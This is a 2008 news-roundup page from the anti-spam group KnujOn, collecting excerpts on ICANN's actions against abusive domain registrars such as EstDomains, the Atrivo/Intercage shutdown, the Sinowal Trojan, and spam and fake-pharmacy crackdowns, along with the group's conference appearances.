Paper letters may also be sent to: Internet Corporation for Assigned Names and Numbers (ICANN), 4676 Admiralty Way, Suite 330, Marina del Rey, CA 90292-6601.
OR 1875 I (EYE) Street, NW, Suite 501, Washington DC, 20006. OR 6 Rond Point Schuman Bt. 5 Brussels B-1040 Belgium.
*Please note that the dedicated mail address for the RAA (raa-consultation@icann.org) is no longer accepting email, they have been
notified of this but we have no further information at this time.
More Information
KnujOn Public Appearances
November 2-7 ICANN Meeting (cai.icann.org)
November 1, 2008
Researchers at RSA report that a Trojan has quietly stolen login credentials from approximately 300,000 online bank accounts, a similar number of credit and debit cards, and an uncounted number of email and FTP accounts.
The Sinowal Trojan, also known as Torpig and Mebroot, has been stealing data for almost three years, RSA says. The new findings suggest that Sinowal "may be one of the most pervasive and advanced pieces of crimeware ever created by fraudsters," the researchers say in a blog published today. Little is known about Sinowal's source, RSA says. Some have alleged that it was owned and operated by a Russian online gang with past ties to the infamous Russian Business Network (RBN). "Our data confirms the Sinowal Trojan has had strong ties to the RBN in the past, but our research indicates that the current hosting facilities of Sinowal may have changed and are no longer connected to the RBN," the researchers say. (darkreading.com)
Virtual Heist Nets 500,000+ Bank, Credit Accounts (washingtonpost.com)
KnujOn Public Appearances
November 2-7 ICANN Meeting (cai.icann.org)
October 31, 2008
Thanks for having KnujOn at this venue. It was great to meet more professionals in the industry who
are concerned about these issues.
KnujOn Public Appearances
November 2-7 ICANN Meeting (cai.icann.org)
October 30, 2008
On 28 October 2008, ICANN sent a notice of termination to EstDomains. Based on an Estonian Court record, ICANN has reason to believe that the president of EstDomains, Vladimir Tsastsin, was convicted of credit card fraud, money laundering and document forgery on 6 February 2008.
ICANN received a response from EstDomains regarding the notice of termination. To assess the merits of the claims made in EstDomains’ response, ICANN has stayed the termination process as ICANN analyzes these claims.
(icann.org)
http://www.icann.org/correspondence/burnette-to-tsastsin-28oct08-en.pdf
http://www.icann.org/correspondence/poltev-to-burnette-29oct08-en.pdf
ICANN does a quick about-face on EstDomains' de-accreditation (thestandard.com)
KnujOn Public Appearances
October 30-31 Information Security Summit (informationsecuritysummit.org)
November 2-7 ICANN Meeting (cai.icann.org)
October 29, 2008 - Extra!
Be advised that the Internet Corporation for Assigned Names and Numbers (ICANN) Registrar Accreditation Agreement
(RAA) for EstDomains, Inc. (Customer No. 919,IANA No. 832) is terminated. Consistent with subsection 5.3.3 of the RAA,
this termination is based on your status as President of EstDomains and your credit card fraud, money laundering and
document forgery conviction. This termination shall be effective within fifteen calendar days from the
date of this letter, on 12 November 2008...
(icann.org)
ICANN De-Accredits EstDomains for CEO's Fraud Convictions:
The entity responsible for overseeing the Internet's domain name system said Tuesday that it was revoking the right of registrar EstDomains.com to process new domain names, citing the company CEO's recent conviction on cyber crime charges...
Kudos to ICANN, and to others -- particularly HostExploit.com and Knujon -- who contributed to shining a light on EstDomains' storied history and practices.
(voices.washingtonpost.com)
ICANN Terminates Accreditation of Notorious Malware Hosting Domain Registrar EstDomains:
The EstDomain company was founded in Tartu, the second largest Estonian city, but it has also been registered as a company in Delaware, US. In a report from KnujOn regarding EstDomain’s activity, it is noted that “Delaware is a tiny state that earns its keep by being very business-friendly. Typically, any business incorporated in Delaware is not actually there”. This prompted several security professionals to question the ICANN practices of accrediting companies that don't really exist where they were incorporated.
(news.softpedia.com)
Three cheers for ICANN! (avertlabs.com)
RBN Farewell To Estdomains (rbnexploit.blogspot.com)
One criminal Internet registrar down... (weblog.infoworld.com)
History
USA Internet community fighting against botnet purveyors
Phishing and Fraud - ICANN Heeds Call to Ban Abusive Registrars
InterCage Back Up - Blames EstDomains for Their Woes
KnujOn.com Calls on Internet Community to End the Fake Pharmacy Menace
More Follow-up And Fallout
EstDomains Continues to Deny Real Location
EstDomains: A Sordid History and a Storied CEO
Atrivo and ESTDomains
Directi Responds to KnujOn Report - Dumps Controversial Service
EstDomains Controversy Continues
SpamHaus Backs-Up HostExploit Report/Wash Post Article
Examining the Role of Registrars in Illicit Activity
Underground Steroid Websites Flourish at U.S. Registrars
Steroid Sites Registered Through EstDomains
KnujOn Public Appearances
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 29, 2008
Mesomorphosis.com, a steroid law reform website, emailed us with some questions about our request to
GoDaddy and other US-based registrars to terminate some steroids websites.
Most, but not all, of the websites were terminated.
Mesomorphosis asked some great questions, and we’re happy to answer them...
(legitscript.com)
KnujOn Public Appearances
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 28, 2008
The "Internet Dark Arts" panel on Thursday at the WebbyConnect conference featured a former affiliate marketing player named Mike Geiger, who used to have what sounded like a thriving side business setting up sites that sent affiliate traffic to illicit pharmaceutical sites.
These are the sites that offer Viagra and other drugs to customers without a doctor's prescription. The affiliate programs are responsible for an avalanche of spam, but what's really scary is the potential for injury to people who shouldn't be consuming the drugs in the first place, or only under the dosages prescribed by a physician or pharmacist.
Geiger was unrepentant about his role in the trade. Affiliate marketing is a "completely legit business," he said, and went on to describe himself as a mere middleman uninvolved with the actual distribution of the drugs. Cash was the obvious reason for getting into affiliate marketing, and Geiger revealed the rewards for pharmaceutical sites were particularly good.
"Why did I choose pharmaceuticals? It was very simple," he said. "[It was] because I would get up to 45% of whatever I sold." This compares to retail affiliate programs offered by Amazon.com and others, where the cut is usually in the low single digits.
(thestandard.com)
KnujOn Public Appearances
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 27, 2008
"There isn't too much to figure out what's happening here. There are several reasons responsible for this as well as other victories in the war against spam and other Internet abuses, one of them being the shutdown of rogue registrars. One of the major soldiers in the trenches can be found at knujon.com which also does a pretty good job of posting up all the news and reports from the battle field."
(news.cnet.com)
KnujOn Public Appearances
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 26, 2008
The internet domain registrar GoDaddy has started shutting down anabolic steroid-related websites under increasing pressure from a pharmacy special interest group called LegitScript.com. LegitScript.com is an internet pharmacy verification service that approves pharmacies that conform to United States federal and state laws.
GoDaddy recently shutdown the following steroid pharmacy websites ominously listing the nameservers as NS1.SUSPENDED-FOR.SPAM-AND-ABUSE.COM and NS2.SUSPENDED-FOR.SPAM-AND-ABUSE.COM:
(mesomorphosis.com)
KnujOn Public Appearances
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 25, 2008
One thing Google has really done a good job of is implementing a few unique features into Gmail that other mainstream email services don’t offer. To give you an example, IMAP support. Of course some services do offer it, but many, especially those that are free, do not. Not only does Google offer IMAP support for free, they recently “Turbo Charged” it and have gone above and beyond what many ever expected them to do when they requested such a feature.
To access these advanced IMAP features, you’ll first have to enable “Advanced IMAP Controls” from the Labs section in Gmail. This is the same place you may have gone to enable those Google Goggles we talked about the other day. Once it is enabled, you’ll be able to go to your settings and configure everything the way you would like it to be.
(cybernetnews.com)
"Great! now i can download all my gmail spam and forward it to Knujon with ease.
Die evil Spammers (or at least go to jail)."
(cybernetnews.com)
From the team that brought you Mail Goggles, here comes...Advanced IMAP Controls, a Labs feature that lets you fine-tune your Gmail IMAP experience. You can choose which labels to sync in IMAP -- useful if you find your mail client choking on a big [Gmail]/All Mail folder.
After enabling this Lab, just go to the Labels tab under Settings. You'll see a new 'Show in IMAP' checkbox next to each of your labels. Uncheck the box and the corresponding folder will disappear from IMAP.
(gmailblog.blogspot.com)
gmail
IMAP
KnujOn Public Appearances
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 24, 2008
The final tallys of HostExploit's and KnujOn's push against illicit sites at Directi in August.
Over 175 thousand domains have been suspended by Directi.
Directi Domain Abuse Actions - Report Oct 09 (hostexploit.com)
FBI, FTC Take Down Scammers & Spammers (washingtonpost.com)
KnujOn Public Appearances
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 23, 2008
The Internet's main governing body, ICANN (The Internet Corporation for Assigned Names and Numbers) said on October 15, 2008 that a German organization, Joker.com and a Chinese organization, DNS.com.cn are selling domain addresses connected to spam mails.
Anti-spam site Knujon.com stated that spammers appear to prefer Websites registered through DNS.com.cn and Joker.com. After exhaustively analyzing junk e-mails for six months, Knujon discovered that 3.3% of Websites registered with DNS.com.cn, over 10,000 in total, referred in spam mails. And over 9,000 Websites registered with Joker.com, 1.42% in total were also linked to spam mails.
(spamfighter.com)
KnujOn Public Appearances
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 21, 2008
ICANN had sent enforcement notices to several domain registrars identified by KnujOn, an anti-spam organization, as having registered the majority of illicit Web sites using spam to generate traffic. KnujOn said 90 percent of Web sites are clustered on just 20 registrars. That represents only 2.5 percent of the 800 registrars accredited by ICANN.
(gcn.com)
KnujOn Public Appearances
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 20, 2008
John Levine, author of The Internet For Dummies,
Fighting Spam for Dummies and a dozen other technical books, got into
a heated public discussion with ICANN's Kieren McCarthy about Registrar compliance in which Levine ponders: "Perhaps you should hire the Knujon guys "[to fix the whois compliance issues].
"
ICANN can't audit the WHOIS data, so it's my job to do so? Aw, come on. WDPRS is a useful band-aid to help with the enormous backlog of bogus WHOIS, but if the compliance process worked, ICANN would find the bad stuff
themselves rather than expecting unpaid volunteers to do their work for them. Perhaps you should hire the Knujon guys. And, as I've pointed out, the compliance issues only begin with bogus WHOIS. There's registrars with
no WHOIS at all, and lots of other egregious violations that I know that [ICANN] knows about.
" (circleid.com)
Cluck, Cluck… ICANN and Contract Compliance Enforcement(circleid.com)
KnujOn Public Appearances
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 19, 2008
The French Cabinet's spokesman says "swindlers" have broken into the personal bank account of President Nicolas Sarkozy.
Spokesman Luc Chatel told France's Radio-J an investigation is under way and insists the incident "proves that this system of checking (bank accounts) via the Internet isn't infallible." He did not elaborate.
(cnn.com)
KnujOn Public Appearances
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 17, 2008
The infamous Storm worm, which powered a network of thousands of compromised PCs once responsible for sending more than 20 percent of all spam, appears to have died off. Security experts say Storm's death knell was sounded by the recent shutdown of Atrivo, a California based ISP that was home to a number of criminal cyber crime operations, including at least three of the master servers used to control the Storm network
(washingtonpost.com)
KnujOn Public Appearances
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 16, 2008
The Internet Corporation for Assigned Names and Numbers (ICANN) said the Chinese company, DNS.com.cn, hadn't properly investigated who owns several of the Web addresses it sold.
ICANN also said it had investigated similar problems at a German company, Joker.com, but found the site's owners had properly investigated similar complaints.
(axcessnews.com)
KnujOn Public Appearances
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 15, 2008
A U.S. district court has ordered a halt to the operations of a vast international spam network that peddled prescription drugs and bogus male-enhancement products. The network has been identified as the largest “spam gang” in the world by the anti-spam organization Spamhaus. The Federal Trade Commission has received more than three million complaints about spam messages connected to this operation, and estimates that it may be responsible for sending billions of illegal spam messages. At the request of the FTC, the court has issued a temporary injunction prohibiting defendants from spamming and making false product claims, and has frozen the defendants’ assets to preserve them for consumer redress pending trial. Authorities in New Zealand also have taken legal action, working in tandem with the FTC.
According to papers filed with the court, the defendants deceptively marketed a variety of products through spam messages, including a male-enhancement pill, prescription drugs, and a weight-loss pill.
One product called “VPXL” was touted as an herbal male-enhancement pill. Advertised as “100% herbal and safe,” it supposedly caused a permanent increase in the size of a user’s penis. The agency alleged that not only did the pills not work, but they were neither “100% herbal” nor “safe,” because they contained sildenafil – the active ingredient in Viagra. At the FTC’s request, the pills were tested by the FDA. According to medical experts, men taking nitrate-containing drugs – which are commonly prescribed to treat diabetes, high blood pressure, high cholesterol, or heart disease – can experience an unsafe drop in their blood pressure when they also take sildenafil. (ftc.gov)
Herbal King gang sent billions of spam messages pushing prescription drugs and phony male-enhancement products:
Garth Bruen, creator of KnujOn, which fights email abuse and online fraud, says the shutdown of Herbal King is “awesome.” “The feds are waking from their slumber,” Bruen says. “CastleCops, Spamhaus and others have done remarkable work. It's been years in the making, [and] these VPXL sleazebags have been raking the money in.”
(darkreading.com)
ICANN Warns Domain Registrars over Compliance (mediacircus.com)
Measurable Drop In Nefarious UCE Activity After Atrivo Demise(infosecurity.us)
Intercage demise causes spam levels to fall(vnunet.com)
Atrivo ISP shutdown sends ripples through the spam deluge(arstechnica.com)
KnujOn Public Appearances
October 14-16 Anti-Phishing Working Group eCrime Researchers Summit "APWG" (antiphishing.org)
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 14, 2008
It’s been for some time so far that a number of independent and volunteer online security research groups have been releasing reports on criminal activities supported by such ISPs as Intercage, a network provider based in California and EstDomains, a domain name registrar allegedly located in Delaware. Researches conducted by HostExploit, StopBadware.org, Spamhaus and Knujon divulged the facts about the involvement of Intercage also known as Atrivo and EstDomains into the cyber crime business including malware download to unsuspecting users, porno products and steroids distribution and spyware installation to rob users of their financial data. An independent study was also initiated by Brian Krebs that leads Security Fix section at Washington Post. The latter was turned into a kind of a forum where disgraced firms posted their confutation to the information presented by the security researchers while their customers, obviously Russians, touched on the raw expressed their despite towards American consolidated efforts directed to weaken adverse impact of criminal syndicates on Internet subscribers in the US.
(ecommerce-journal.com)
Cluck, Cluck… ICANN and Contract Compliance Enforcement(circleid.com)
KnujOn Public Appearances
October 14-16 Anti-Phishing Working Group eCrime Researchers Summit "APWG" (antiphishing.org)
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 13, 2008
HUNCHED over a computer terminal in his pyjamas, "Frank" makes more money than a small-time drug dealer without ever having to worry about being caught or even leaving the house.
Constantly covering his tracks via a complex web of internet servers, he is part of a global network of cyber thieves who together fleece billions of dollars from unsuspecting internet users every year - using little more than an internet connection, free software and some spare time.
Speaking to the Herald on the condition of anonymity, he and other experienced hackers say banks' attempts to stamp out credit card theft are doomed due to the ease with which clients' computers can be compromised.
(smh.com.au)
KnujOn Public Appearances
October 14-16 Anti-Phishing Working Group eCrime Researchers Summit "APWG" (antiphishing.org)
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 12, 2008
Security experts and the federal government are warning that scam artists are leveraging public concern over the global financial crisis to steal sensitive financial data and spread malicious software.
In an alert posted Thursday, the Federal Trade Commission urged Internet users to be on guard against e-mails that look as if they come from a financial institution that recently acquired a consumer's bank, savings and loan, or mortgage.
(washingtonpost.com)
KnujOn Public Appearances
October 14-16 Anti-Phishing Working Group eCrime Researchers Summit "APWG" (antiphishing.org)
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 11, 2008
The World Bank Group's computer network — one of the largest repositories of sensitive data about the economies of every nation — has been raided repeatedly by outsiders for more than a year, FOX News has learned.
It is still not known how much information was stolen. But sources inside the bank confirm that servers in the institution's highly-restricted treasury unit were deeply penetrated with spy software last April. Invaders also had full access to the rest of the bank's network for nearly a month in June and July.
In total, at least six major intrusions — two of them using the same group of IP addresses originating from China — have been detected at the World Bank since the summer of 2007, with the most recent breach occurring just last month.
(foxnews.com)
KnujOn Public Appearances
October 14-16 Anti-Phishing Working Group eCrime Researchers Summit "APWG" (antiphishing.org)
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 10, 2008
Security Fix has spilled quite a bit of digital ink chronicling the demise of Atrivo (a.k.a. "Intercage"), a now-defunct Northern Calif. based Internet service provider that served as home base for a large number of cyber criminal operations. Happily, data released this week about a short-lived but precipitous decline in the level of badness online after Atrivo was shut down illustrates just how bad Atrivo was.
Internet security firm MessageLabs said it observed a significant drop in the level of spam and botnet activity after Atrivo's upstream Internet providers pulled the plug on the company last month. The graphic to the right shows a collapse in the level of spam emanating from computers infected with the some of the nastiest spam-enabling malware, including the Storm worm, Cutwail, Srizbi and MegaD.
MessageLabs said the decline was due to the fact that a large number of command and control networks used to control these distributed malware spam systems were located on servers on Atrivo's network.
(washingtonpost.com)
KnujOn Public Appearances
October 14-16 Anti-Phishing Working Group eCrime Researchers Summit "APWG" (antiphishing.org)
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 9, 2008
The APWG’s Internet Policy Committee (APWG-IPC) and Carnegie Mellon University’s Supporting Trust Decisions Project (STDP) have joined forces to educate consumers about phishing and, in doing so, have established the AWPG/CMU Phishing Education Landing Page Program. The goal of this initiative is to instruct consumers on online safety at the “most teachable moment”: when they have just clicked on a link in a phishing communication.
(education.apwg.org)
KnujOn Public Appearances
October 14-16 Anti-Phishing Working Group eCrime Researchers Summit "APWG" (antiphishing.org)
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 8, 2008
ICANN may wonder why organizations like KnujOn exist and regularly publish reports about registrars who fail to comply with even the regulations ICANN can enforce, and so much criticism is directed at the organization for being "toothless." Looking at a year-long process to levy what is essentially wrist-slap for allowing spammers to register domains with false or missing information and then backing down might be a good place to start. A year is far too long to deal with the problem of spammers, who have usually moved on well before ICANN even begins their process to register other domains.
(thestandard.com)
Spammers Favor Obama Over McCain 7 to 1 (washingtonpost.com)
Palin E-Mail Hacker Indicted (foxnews.com)
KnujOn Public Appearances
October 14-16 Anti-Phishing Working Group eCrime Researchers Summit "APWG" (antiphishing.org)
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 7, 2008
The phone rang. It was from 626-273-8207. I answered. It was the infamous "car warranty" call. Most folks hang up, and should, but for us it was a chance to get into the inner workings on the telephone scam world. The automated message said: "Press 2 to continue." After pressing 2 we were on hold for a very long time. Finally, a very gruff and tired voice answered:
Gruff Scam Man: Car warranty department, may I have the make and model of your car?
KnujOn: Actually, can I have the name of your company?
Gruff Scam Man: No.
KnujOn: Why not?
Gruff Scam Man hung up.
The carrier of this number is Digitcom Services, Inc. Alhambra, CA, somewhat irrelevant because they dump these numbers frequently and get new ones as they are blocked. The real issue is who benefits from this?
The bulk of the companies doing this are located near St. Louis. The Better Business Bureau of Eastern Missouri and Southern Illinois lists 92 extended warranty companies in that area. They are responsible for a huge number of complaints from across the country.
(msnbc.msn.com)
Auto One is located in Irvine, Calif., and is a subsidiary of Credexx, a loan consolidator. It caught the attention of the Better Business Bureau last year due to the high number of complaints about its warranty expiration notices and difficulty processing claims. The Bureau rated the company an F.
According to Bureau records, the president of Auto One is David Tabb, 41, a man with a history of dicey consumer practices. Another of Tabb's companies, Hollywood Dreams, was listed at an address next door to Auto One. Hollywood Dreams was a company used as a front for selling sports and Hollywood memorabilia with forged signatures. In 2002 Tabb pleaded guilty to one count of conspiracy to commit mail fraud and one count of tax evasion for his part in a scam to sell the forged merchandise. According to the indictment filed in U.S. District Court, Tabb arranged to meet an undercover federal agent at a Chevron gas station in Irvine to sell him basketballs and other sporting items with forged signatures and fake certificates of authenticity. He continued to sell undercover feds forged merchandise, usually in parking lots, over the next year. Tabb did not respond to messages left at his last known home number or Auto One offices.
(seattleweekly.com)
KnujOn Public Appearances
October 14-16 Anti-Phishing Working Group eCrime Researchers Summit "APWG" (antiphishing.org)
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 6, 2008
A member of the European Parliament, William Newton-Dunn, has recently been addressing questions to the European Commission which asks whether ICANN is engaging in restraint of European free trade laws by imposing restrictions on who can operate a TLD and sell domain names. Some restrictions are considered insurmountable by many small business owners and individuals, such as the non-refundable $50,000 application fee.
(gambling911.com)
KnujOn Public Appearances
October 14-16 Anti-Phishing Working Group eCrime Researchers Summit "APWG" (antiphishing.org)
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 5, 2008
ICANN had actually sent initial "Notices of Concern" regarding the same issue to both firms in May after an initial report listing abusive registrars was published by KnujOn, which recently pushed another major registrar, Directi, to mend its own ways and another, EstDomains, to promise to do the same.
"Both (DNS.com.cn, and Joker.com) subsequently assured ICANN that they were investigating Whois inaccuracy claims and had suitable processes in place to do so. However, ICANN found compelling evidence leading to a conclusion that both DNS.com.cn and Joker.com do not appear to be taking reasonable steps to investigate these claims as required," ICANN said in a statement.
To avoid the commencement of the termination process, DNS.com.cn and Joker.com must now "cure the cited breaches within 15 days."
If not, ICANN said it will "pursue all remedies available under the terms of the RAA, including possible termination."
(securitywatch.eweek.com)
Analysis: Bringing law to the Internet (metimes.com)
KnujOn Public Appearances
October 14-16 Anti-Phishing Working Group eCrime Researchers Summit "APWG" (antiphishing.org)
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 4, 2008
The Internet Corporation for Assigned Names and Numbers, known as ICANN, sent formal breach notices Tuesday to two of the registrars that it accredits, giving them 15 days to fix the problem or lose their accreditation. The registrars - Swiss-based Joker.com and Beijing Innovative Linkage Technology Ltd., doing business as DNS.com.cn - lease out about 900,000 Internet addresses, known as domain names.
...
"We are sending a message in public ... that everyone needs to be vigilant," said Paul Levins, ICANN's vice president for corporate affairs.
...
"There are some domain registrars who facilitate criminal activities on the Web by turning a blind eye" to registrants who deliberately provide false or incomplete Whois information, said Garth Bruen of the anti-spam advocacy group KnujOn - "no junk" spelled backward.
He says a hard core of registrars rent most of the domain names that contain the Web sites advertised in spam e-mails — billions of unsolicited messages sent every year, mostly by so-called botnets of personal computers that, unbeknown to their owners, have been taken over by hackers and other cybercriminals.
Earlier this year, Mr. Bruen analyzed millions of spam e-mail messages forwarded by members of the public. He concluded that 90 percent of the Web addresses the spam advertised had been leased by just 20 registrars.
(washingtontimes.com)
KnujOn Public Appearances
October 14-16 Anti-Phishing Working Group eCrime Researchers Summit "APWG" (antiphishing.org)
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 3, 2008
Two days ago ICANN issued
breach notices to Joker and Beijing Innovative Linkage Technology Ltd (DNS.com.cn)
which should lead to their de-accreditation by October 14th.
Beijing Innovative and
Joker were numbers 2 and 4 on
KnujOn's 10 Worst List, respectively.
Every KnujOn participant and supporter needs to give themselves a big pat on the back tonight
because YOU made this happen. KnujOn processed your submissions and filed thousands of
complaints and tracked them continuously to ensure contracts were observed and the public
trust was not broken. In May of this year
ICANN responded to
KnujOn's report
by issuing enforcement notices against the rogue Registrars. Some of these Registrars have made amazing
improvements since the report was released, but the two being issued breach notices this week did little
or nothing and are now paying the price for policy failure. More to come soon.
Internet body cracking down on shady Web sites (upi.com)
KnujOn Public Appearances
October 14-16 Anti-Phishing Working Group eCrime Researchers Summit "APWG" (antiphishing.org)
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 2, 2008
ICANN has sent breach notices to two ICANN-accredited registrars, Beijing Innovative Linkage Technology Ltd., doing business as DNS.com.cn and Joker.com, on 30 September 2008.
These registrars failed to comply with Section 3.7.8 of the Registrar Accreditation Agreement (RAA) which requires registrars to take "reasonable steps to investigate" Whois inaccuracy claims.
Section 3.7.8 of the RAA requires registrars, "…upon notification by any person of an inaccuracy in the contact information associated with a Registered Name sponsored by Registrar, take reasonable steps to investigate the claimed inaccuracy. In the event Registrar learns of inaccurate contact information associated with a Registered Name it sponsors, it shall take reasonable steps to correct that inaccuracy."
In November 2007, ICANN audited registrar compliance with the investigation of Whois inaccuracy claims filed through ICANN's Whois Data Problem Report System (WDPRS). The audit analyzes the complaints as well as complainant follow-up correspondence indicating "no change" to Whois data 45 days after the claim is filed. Registrars that appear to take no action in response to a significant percentage of WDPRS complaints are sent a Notice of Concern that request they provide ICANN with details regarding the steps taken to investigate the claimed Whois inaccuracies - as required by Section 3.7.8 of the RAA.
On 29 May 2008, ICANN sent Joker.com and DNS.com.cn Notices of Concern. Both subsequently assured ICANN that they were investigating Whois inaccuracy claims and had suitable processes in place to do so. However, ICANN found compelling evidence leading to a conclusion that both DNS.com.cn and Joker.com do not appear to be taking reasonable steps to investigate these claims as required.
Accordingly, on 30 September 2008 ICANN sent DNS.com.cn and Joker.com notices of breach of contract. To avoid the commencement of the termination process, DNS.com.cn and Joker.com must cure the cited breaches within 15 days. ICANN will pursue all remedies available under the terms of the RAA, including possible termination, if DNS.com.cn and Joker.com fail to cure the cited breaches.
DNS.com.cn has over 300,000 domain names under management and Joker.com has over 600,000 domain names under management.
ICANN's efforts to improve Whois accuracy are ongoing and registrars are advised to investigate every claim of Whois inaccuracy received as required by Section 3.7.8 of the RAA to avoid compliance action by ICANN.
(icann.org)
KnujOn Public Appearances
October 14-16 Anti-Phishing Working Group eCrime Researchers Summit "APWG" (antiphishing.org)
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 1, 2008
KnujOn's Garth Bruen attended and spoke at the Improving Institutional Confidence in ICANN public session
at the National Press Club in Washington, D.C. This was a very intense and insightful meeting. The details will be discussed here
extensively in the next week.
KnujOn Public Appearances
October 14-16 Anti-Phishing Working Group eCrime Researchers Summit "APWG" (antiphishing.org)
October 30-31 Information Security Summit (informationsecuritysummit.org)
September 27, 2008
The House of Representatives on Tuesday passed the Ryan Haight Online Pharmacy Consumer Protection Act, a bill that would would ban the sale or distribution of prescription drugs over the Internet without a valid prescription. Matching legislation passed in the Senate in April, but the House sent its version back to the Senate with amendments on Thursday.
Under the proposed law, online pharmacies would have to comply with pharmacy licensing laws in each state in which they do business and register with the relevant state attorneys general. Some congressmen questioned the impact of the bill, given that so many online pharmacies that distribute drugs without prescriptions are based outside the U.S. (cnet.com)
KnujOn Public Appearances
October 14-16 Anti-Phishing Working Group eCrime Researchers Summit "APWG" (antiphishing.org)
October 30-31 Information Security Summit (informationsecuritysummit.org)
September 26, 2008
KnujOn received a standing ovation at the closing session of
The Messaging Anti-Abuse Working Group (maawg.org)
meeting in Fort Lauderdale, Florida.
The community has expressed its appreciation of our work and has taken steps to continue supporing us.
KnujOn Public Appearances
October 14-16 Anti-Phishing Working Group eCrime Researchers Summit "APWG" (antiphishing.org)
October 30-31 Information Security Summit (informationsecuritysummit.org)
September 25, 2008
KnujOn has presented to many law enforcement, investigative, and anti-abuse groups. This
was our first presentation to a group specifically dedicated to security software development.
In one of the largest conferences of its kind,
The Open Web Application Security Project
(owasp.org) brought together an unprecedented number of experts in the field to
discuss the state of software security.
KnujOn effectively delivered the message that good software needs good policy (and vice-versa).
KnujOn wants to thank Tom Brennan specifically for inviting us.
KnujOn Public Appearances
October 14-16 Anti-Phishing Working Group eCrime Researchers Summit "APWG" (antiphishing.org)
October 30-31 Information Security Summit (informationsecuritysummit.org)
September 24, 2008
A day after security experts celebrated the death of a network provider accused of hosting a large concentration of the world's cybercrime, California-based Intercage appeared to be among the living again.
IP transit provider UnitedLayer agreed to provide upstream service to Intercage about 36 hours after its last transit provider pulled the plug. UnitedLayer's move, which is sure to prove unpopular in some circles, came after Intercage agreed to completely sever ties with Esthost, the Eastern European web host believed by many to be responsible for the lion's share of abusive traffic carried by Intercage.
(theregister.co.uk)
Controversial ISP Intercage Now Back Online
Pressure from computer security researchers may have knocked ISP (Internet service provider) Intercage offline, but not for long.
The San Francisco company, accused of being a haven to online criminals, is now back, just days after its last upstream network provider, Pacific Internet Exchange, dropped it as a customer.
Pacific had been Intercage's point of contact with the Internet's backbone, but it had dropped Intercage's service late Saturday night, knocking the controversial Internet service provider offline. (pcworld.com)
KnujOn Public Appearances
September 23-25 Open Web Application Security Project "OWASP" (owasp.org)
October 14-16 Anti-Phishing Working Group eCrime Researchers Summit "APWG" (antiphishing.org)
October 30-31 Information Security Summit (informationsecuritysummit.org)
September 23, 2008
Recent public disclosures and positive activity within the Internet security community have provided encouraging news for long-suffering spam and malware victims. The demise of Atrivo/Intercage and recent revelations about EstDomains boost our belief that aggressive policy enforcement, efficient data collection, and industry cooperation can make a huge difference in creating a new, safer Internet. However, there is still quite a bit of work to be done.
KnujOn is calling on all the Domain Name Registrars and other concerned parties to help develop policy and methods to specifically put a stop to the fake pharmacy menace.
The Directi Group has lead the way by making a commitment to end the easy flow of counterfeit and hijacked pharmaceuticals on the Internet.
KnujOn invites all companies in the ICANN-Accredited community to make the same public pledge.
To this end KnujOn will be presenting a plan and series of proposals at several events in the near future. Our Three-Point plan (Fixing the Broken Policy Structure, Eradicating Illicit Internet Traffic, and Enfranchising the Consumer) will be discussed at the
Messaging Anti-Abuse Working Group (MAAWG) General Meeting September 23rd,
the Open Web Application Security Project (OWASP) Conference September 24th,
Anti-Phishing Working Group (APWG) eCrime Researchers Summit October 15th, and the
Information Security Summit October 31st. Details about each event are listed on KnujOn.com.
One of our proposals to the security community could be a "game-changer" in terms of dealing with malware and
other security threats. KnujOn looks forward to the community's support in this endeavor.
September 22, 2008
California-based network provider Intercage has gone completely offline following weeks of scathing criticism that it hosts an inordinate number of sites engaged in phishing, malware propagation, and other illegal activities.
Pacific Internet Exchange, which only began providing upstream service to Intercage in the last week or so, pulled the plug on Saturday night.
It's a safe bet that PIE's move was in response to recent efforts to isolate Intercage following a report that it enables a rogue's gallery of customers to punt spam, malware, and online (illegal) pharmaceuticals. The report so tarnished Intercage's already struggling reputation that both of its longterm providers canceled service.
According to an email sent last week by Intercage president and owner Emil Kacperski, PIE was immediately punished for its actions. Within a few days, a block of IP addresses issued to PIE were included on the Spamhaus block list, according to Brian at PIE. Spamhaus officials were not immediately available to comment.
An outgoing message on Kacperski's voice mail apologized for the outage and said company officials were "trying to get this resolved as soon as possible."
Volunteers active in ridding the internet of abusive sites celebrated the take down of Intercage, which has also gone under the name Atrivo.
(theregister.co.uk)
Internet Shuns U.S. Based ISP Amid Fraud, Abuse Allegations
Atrivo, a.k.a "Intercage," of Northern California, ceased to be reachable from any points on the Internet early Sunday morning when the ISP's sole remaining provider - Pacific Internet Exchange (PIE) - stopped routing traffic for the troubled company.
The final blow comes just weeks after Security Fix joined several researchers in publishing evidence that major portions of Atrivo's network were being used to foist fake security software, Trojan horse programs, and other nastiness. As a result of those reports, several of Atrivo's upstream providers dropped the company as a client.
(voices.washingtonpost.com)
Russian Business Network (RBN) Atrivo Goes Dark
It is pleasing to report the last remaining peer routing Atrivo (AS 27595 Atrivo/ Intercage), ‘Pacific Internet Exchange’ (PIE) see Spamhaus ref below, was withdrawn at 2:35am EST Sunday Sept 21st 2008.
(voices.washingtonpost.com)
KnujOn Public Appearances
September 23rd Messaging Anti-Abuse Working Group "MAAWG" (maawg.org)
September 23-25 Open Web Application Security Project "OWASP" (owasp.org)
